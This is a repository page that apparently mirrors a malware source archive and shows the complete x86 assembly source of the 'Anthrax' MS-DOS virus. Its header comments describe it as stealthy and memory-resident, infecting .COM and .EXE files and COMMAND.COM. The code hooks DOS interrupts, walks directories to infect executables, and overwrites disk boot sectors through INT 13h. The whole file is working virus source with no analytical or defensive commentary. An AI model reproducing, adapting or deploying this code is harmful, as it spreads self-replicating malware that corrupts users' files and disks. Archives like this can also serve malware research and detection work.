ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
bb32e71ff5
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.anthrax.asm
vxunderground d3381d8e02
Add files via upload
2021-01-12 17:31:39 -06:00

450 lines
11 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;**************************************************************************
;** ANTHRAX VIRUS **
;** Created: 2 Jan 90 Programmer: (c) Damage, Inc. **
;** [NukE] Notes: Another Stealth Type of Virus! and this one is Detected**
;** by Scan (McAfee & Assc.) And does copy itself to *.COM **
;** *.EXE and the Command.Com and is Memory Resident! **
;** **
;** Sources brought to you by -> Rock Steady [NukE]s Head Programmer! **
;** **
;**************************************************************************
.286p
DATA_1E EQU 46CH ; (0000:046C=2DH)
DATA_2E EQU 4 ; (65AC:0004=0)
DATA_3E EQU 7 ; (65AC:0007=0)
DATA_10E EQU 5FEH ; (65AC:05FE=0)
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
ANTHRAX PROC FAR
START:
JMP LOC_24 ; (043B)
DB 13 DUP (0)
DB 95H, 8CH, 0C8H, 2DH, 0, 0
DB 0BAH, 0, 0, 50H, 52H, 1EH
DB 33H, 0C9H, 8EH, 0D9H, 0BEH, 4CH
DB 0, 0B8H, 0CDH, 0, 8CH, 0CAH
DB 87H, 44H, 44H, 87H, 54H, 46H
DB 52H, 50H, 0C4H, 1CH, 0B4H, 13H
DB 0CDH, 2FH, 6, 53H, 0B4H, 13H
DB 0CDH, 2FH, 58H, 5AH, 87H, 4
DB 87H, 54H, 2, 52H, 50H, 51H
DB 56H, 0A0H, 3FH, 4, 0A8H, 0FH
DB 75H, 6CH, 0EH, 7, 0BAH, 80H
DB 0, 0B1H, 3, 0BBH, 77H, 6
DB 0B8H, 1, 2, 50H, 0CDH, 13H
DB 58H, 0B1H, 1, 0BBH, 0, 4
DB 0CDH, 13H, 0EH, 1FH, 0BEH, 9BH
DB 3, 8BH, 0FBH, 0B9H, 5EH, 0
DB 56H, 0F3H, 0A6H, 5EH, 8BH, 0FBH
DB 0B9H, 62H, 0, 56H, 0F3H, 0A4H
DB 5FH, 0BEH, 12H, 8, 0B9H, 65H
DB 0, 0F3H, 0A4H, 74H, 1EH, 89H
DB 4DH, 0E9H, 0B1H, 5CH, 89H, 4DH
DB 9BH, 88H, 6DH, 0DCH, 0B1H, 2
DB 33H, 0DBH, 0B8H, 2, 3, 0CDH
DB 13H, 49H, 0BBH, 0, 4, 0B8H
DB 1, 3, 0CDH, 13H, 49H, 0B4H
DB 19H, 0CDH, 21H, 50H, 0B2H, 2
DB 0B4H, 0EH, 0CDH, 21H, 0B7H, 2
DB 0E8H, 87H, 1, 5AH, 0B4H, 0EH
DB 0CDH, 21H, 5EH, 1FH, 8FH, 4
DB 8FH, 44H, 2, 8FH, 44H, 44H
DB 8FH, 44H, 46H, 1FH, 1EH, 7
DB 95H, 0CBH
copyright DB '(c) Damage, Inc.'
DB 0, 0B0H, 3, 0CFH, 6, 1EH
DB 57H, 56H, 50H, 33H, 0C0H, 8EH
DB 0D8H, 0BEH, 86H, 0, 0EH, 7
DB 0BFH, 8, 6, 0FDH, 0ADH, 0ABH
DB 0A5H, 0AFH, 87H, 0F7H, 0ADH, 0FCH
DB 74H, 11H, 1EH, 7, 0AFH, 0B8H
DB 7, 1, 0ABH, 8CH, 0C8H, 0ABH
DB 8EH, 0D8H, 0BFH, 68H, 0, 0A5H
DB 0A5H, 58H, 5EH, 5FH, 1FH, 7
DB 2EH, 0FFH, 2EH, 0, 6, 6
DB 1EH, 57H, 56H, 52H, 51H, 53H
DB 50H, 0EH, 1FH, 0BEH, 6, 6
DB 33H, 0C9H, 8EH, 0C1H, 0BFH, 84H
DB 0, 0A5H, 0A5H, 0B4H, 52H, 0CDH
DB 21H, 26H, 8BH, 47H, 0FEH, 8EH
DB 0D8H, 0BBH, 3, 0, 3, 7
DB 40H, 8EH, 0D8H, 81H, 7, 80H
DB 0, 0EH, 7, 0B7H, 12H, 0E8H
DB 0F2H, 0, 58H, 5BH, 59H, 5AH
DB 5EH, 5FH, 1FH, 7, 2EH, 0FFH
DB 2EH, 6, 6
LOC_RET_1:
RETN
DB 91H, 0AEH, 0B4H, 0A8H, 0BFH
DB 20H, 31H, 39H, 39H, 30H
ANTHRAX ENDP
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; SUBROUTINE
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
SUB_1 PROC NEAR
MOV AX,3D00H
INT 21H ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
JC LOC_RET_1 ; Jump if carry Set
XCHG AX,BX
MOV AX,1220H
INT 2FH ; Multiplex/Spooler al=func 20h
PUSH BX
MOV BL,ES:[DI]
MOV AX,1216H
INT 2FH ; Multiplex/Spooler al=func 16h
POP BX
MOV SI,462H
MOV DX,SI
MOV CL,18H
MOV AH,3FH ; '?'
INT 21H ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
XOR AX,CX
JNZ LOC_7 ; Jump if not zero
PUSH ES
POP DS
MOV BYTE PTR [DI+2],2
XOR DX,DX ; Zero register
LOC_2:
IN AL,DX ; port 0, DMA-1 bas&add ch 0
CMP AL,10H
JB LOC_2 ; Jump if below
ADD AX,[DI+11H]
ADC DX,[DI+13H]
AND AL,0F0H
CMP AX,0FB00H
JAE LOC_7 ; Jump if above or =
MOV [DI+15H],AX
MOV [DI+17H],DX
PUSH CS
POP DS
PUSH AX
MOV CL,10H
DIV CX ; ax,dx rem=dx:ax/reg
SUB AX,[SI+8]
MOV CX,AX
SUB AX,[SI+16H]
MOV DS:DATA_2E,AX ; (65AC:0004=0)
LODSW ; String [si] to ax
XOR AX,5A4DH
JZ LOC_3 ; Jump if zero
XOR AX,1717H
LOC_3:
PUSHF ; Push flags
JNZ LOC_4 ; Jump if not zero
MOV [SI],AX
CMP AX,[SI+0AH]
XCHG AX,[SI+12H]
MOV DS:DATA_3E,AX ; (65AC:0007=0)
MOV [SI+14H],CX
MOV CX,4DCH
JZ LOC_5 ; Jump if zero
ADD WORD PTR [SI+8],48H
LOC_4:
MOV CX,65H
LOC_5:
PUSH CX
MOV CX,39BH
MOV AH,40H ; '@'
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
XOR CX,AX
POP CX
JNZ LOC_6 ; Jump if not zero
MOV DX,400H
MOV AH,40H ; '@'
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
XOR CX,AX
LOC_6:
POP DX
POP AX
LOC_7:
JNZ LOC_11 ; Jump if not zero
MOV ES:[DI+15H],CX
MOV ES:[DI+17H],CX
PUSH DX
POPF ; Pop flags
JNZ LOC_9 ; Jump if not zero
MOV AX,ES:[DI+11H]
MOV DX,ES:[DI+13H]
MOV CH,2
DIV CX ; ax,dx rem=dx:ax/reg
TEST DX,DX
JZ LOC_8 ; Jump if zero
INC AX
LOC_8:
MOV [SI],DX
MOV [SI+2],AX
JMP SHORT LOC_10 ; (0328)
LOC_9:
MOV BYTE PTR [SI-2],0E9H
ADD AX,328H
MOV [SI-1],AX
LOC_10:
MOV CX,18H
LEA DX,[SI-2] ; Load effective addr
MOV AH,40H ; '@'
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
LOC_11:
OR BYTE PTR ES:[DI+6],40H ; '@'
MOV AH,3EH ; '>'
LOC_12:
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
RETN
SUB_1 ENDP
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; SUBROUTINE
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
SUB_2 PROC NEAR
MOV DS,CX
MOV BL,DS:DATA_1E ; (0000:046C=34H)
PUSH CS
POP DS
INC DATA_7 ; (65AC:045E=0FC00H)
MOV DX,64BH
CALL SUB_3 ; (036D)
MOV SI,60AH
MOV BYTE PTR [SI],5CH ; '\'
INC SI
XOR DL,DL ; Zero register
MOV AH,47H ; 'G'
INT 21H ; DOS Services ah=function 47h
; get present dir,drive dl,1=a:
MOV DX,39BH
LOC_13:
MOV AH,3BH ; ';'
INT 21H ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
JCXZ LOC_14 ; Jump if cx=0
MOV AH,51H ; 'Q'
INT 21H ; DOS Services ah=function 51h
; get active PSP segment in bx
MOV DS,BX
MOV DX,80H
;<3B><><EFBFBD><EFBFBD> External Entry into Subroutine <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
SUB_3:
MOV AH,1AH
JMP SHORT LOC_12 ; (0339)
LOC_14:
JC LOC_17 ; Jump if carry Set
MOV SI,39CH
XOR DL,DL ; Zero register
MOV AH,47H ; 'G'
INT 21H ; DOS Services ah=function 47h
; get present dir,drive dl,1=a:
CMP CH,BYTE PTR DS:[3DCH] ; (65AC:03DC=81H)
LOC_15:
MOV CL,32H ; '2'
MOV DX,29DH
MOV AH,4EH ; 'N'
JZ LOC_20 ; Jump if zero
INT 21H ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
JC LOC_17 ; Jump if carry Set
LOC_16:
MOV DX,64BH
MOV AX,4F01H
MOV SI,3DCH
MOV DI,668H
STOSB ; Store al to es:[di]
MOV CL,0DH
REPE CMPSB ; Rep zf=1+cx >0 Cmp [si] to es:[di]
JZ LOC_20 ; Jump if zero
CMP CH,[DI-2]
JE LOC_20 ; Jump if equal
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
JNC LOC_16 ; Jump if carry=0
XOR AL,AL ; Zero register
JMP SHORT LOC_15 ; (0380)
DB 2AH, 2EH, 2AH, 0
LOC_17:
MOV CL,41H ; 'A'
MOV DI,39CH
CMP CH,[DI]
MOV AL,CH
MOV BYTE PTR DS:[3DCH],AL ; (65AC:03DC=81H)
JZ LOC_23 ; Jump if zero
REPNE SCASB ; Rep zf=0+cx >0 Scan es:[di] for al
DEC DI
MOV CL,41H ; 'A'
MOV AL,5CH ; '\'
STD ; Set direction flag
REPNE SCASB ; Rep zf=0+cx >0 Scan es:[di] for al
LEA SI,[DI+2] ; Load effective addr
MOV DI,3DCH
CLD ; Clear direction
LOC_18:
LODSB ; String [si] to al
TEST AL,AL
STOSB ; Store al to es:[di]
JNZ LOC_18 ; Jump if not zero
MOV DX,2CDH
XOR CL,CL ; Zero register
JMP SHORT LOC_13 ; (035E)
DB 2EH, 2EH, 0
LOC_19:
MOV DX,64BH
MOV AH,4FH ; 'O'
LOC_20:
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
JC LOC_17 ; Jump if carry Set
DATA_6 DW 69BEH
DB 6, 0BFH, 0DCH, 3, 80H, 3CH
DB 2EH, 74H, 0ECH, 88H, 2DH, 8BH
DB 0D6H, 0F6H, 44H, 0F7H, 10H, 75H
DB 0DBH
LOC_21:
LODSB ; String [si] to al
TEST AL,AL
STOSB ; Store al to es:[di]
JNZ LOC_21 ; Jump if not zero
DEC SI
STD ; Set direction flag
LODSW ; String [si] to ax
LODSW ; String [si] to ax
CLD ; Clear direction
CMP AX,4558H
JE LOC_22 ; Jump if equal
CMP AX,4D4FH
JNE LOC_19 ; Jump if not equal
LOC_22:
PUSH BX
CALL SUB_1 ; (0262)
POP BX
XOR CX,CX ; Zero register
MOV ES,CX
MOV AL,ES:DATA_1E ; (0000:046C=38H)
PUSH CS
POP ES
SUB AL,BL
CMP AL,BH
JB LOC_19 ; Jump if below
LOC_23:
MOV DX,80H
MOV CL,3
MOV BX,200H
MOV AX,301H
INT 13H ; Disk dl=drive 0: ah=func 03h
; write sectors from mem es:bx
MOV DX,60AH
JMP LOC_13 ; (035E)
SUB_2 ENDP
LOC_24:
XCHG AX,BP
MOV DI,100H
MOV BX,[DI+1]
SUB BX,228H
MOV AX,DI
LEA SI,[BX+3FDH] ; Load effective addr
MOVSW ; Mov [si] to es:[di]
MOVSB ; Mov [si] to es:[di]
XCHG AX,BX
MOV CL,4
SHR AX,CL ; Shift w/zeros fill
MOV CX,DS
ADD AX,CX
MOV DX,0BH
JMP SHORT LOC_26 ; (04CD)
DB 0B8H, 0D0H
DATA_7 DW 0FC00H
DATA_8 DW 8587H
DB 68H, 0FAH, 0ABH, 8CH, 0C8H, 0E2H
DB 0F7H, 0A3H, 86H, 0, 0ABH, 8EH
DB 0D8H, 0B4H, 8, 0CDH, 13H, 49H
DB 49H, 0A1H, 0E9H, 3, 84H, 0E4H
DB 74H, 1, 91H, 0B2H, 80H, 0B8H
DB 3, 3, 0CDH, 13H, 91H, 84H
DB 0E4H, 75H, 2
DB 2CH, 40H
LOC_25:
DEC AH
MOV DATA_6,AX ; (65AC:03E9=69BEH)
INC DATA_8 ; (65AC:0460=8587H)
XOR DH,DH ; Zero register
MOV CX,1
MOV BX,400H
MOV AX,301H
INT 13H ; Disk dl=drive ?: ah=func 03h
; write sectors from mem es:bx
MOV DL,DH
RETF ; Return far
DB 41H, 4EH, 54H, 48H, 52H, 41H
DB 58H, 0EH, 1FH, 83H, 2EH, 13H
DB 4, 2, 0CDH, 12H, 0B1H, 6
DB 0D3H, 0E0H, 8EH, 0C0H, 0BFH, 0
DB 4, 0BEH, 0, 7CH, 0B9H, 0
DB 1, 8BH, 0DEH, 0FCH, 0F3H, 0A5H
DB 8EH, 0D8H, 0BAH, 27H, 4
LOC_26:
PUSH CX
PUSH BX
PUSH AX
PUSH DX
RETF ; Return far
DB 8EH, 0C1H, 0B1H, 4, 0BEH, 0B0H
DB 5
LOCLOOP_27:
ADD SI,0EH
LODSW ; String [si] to ax
CMP AL,80H
JE LOC_29 ; Jump if equal
LOOP LOCLOOP_27 ; Loop if cx > 0
LOC_28:
INT 18H ; ROM basic
LOC_29:
XCHG AX,DX
STD ; Set direction flag
LODSW ; String [si] to ax
XCHG AX,CX
MOV AX,201H
INT 13H ; Disk dl=drive a: ah=func 02h
; read sectors to memory es:bx
CMP WORD PTR DS:DATA_10E,0AA55H ; (65AC:05FE=0)
JNE LOC_28 ; Jump if not equal
PUSH ES
PUSH DS
POP ES
POP DS
XOR DH,DH ; Zero register
MOV CX,2
XOR BX,BX ; Zero register
MOV AX,202H
INT 13H ; Disk dl=drive a: ah=func 02h
; read sectors to memory es:bx
JMP $-10FH
DB 0, 0, 0, 0, 0CDH, 20H
DB 0CCH
DB 112 DUP (1AH)
SEG_A ENDS
END START

Reference in New Issue View Git Blame Copy Permalink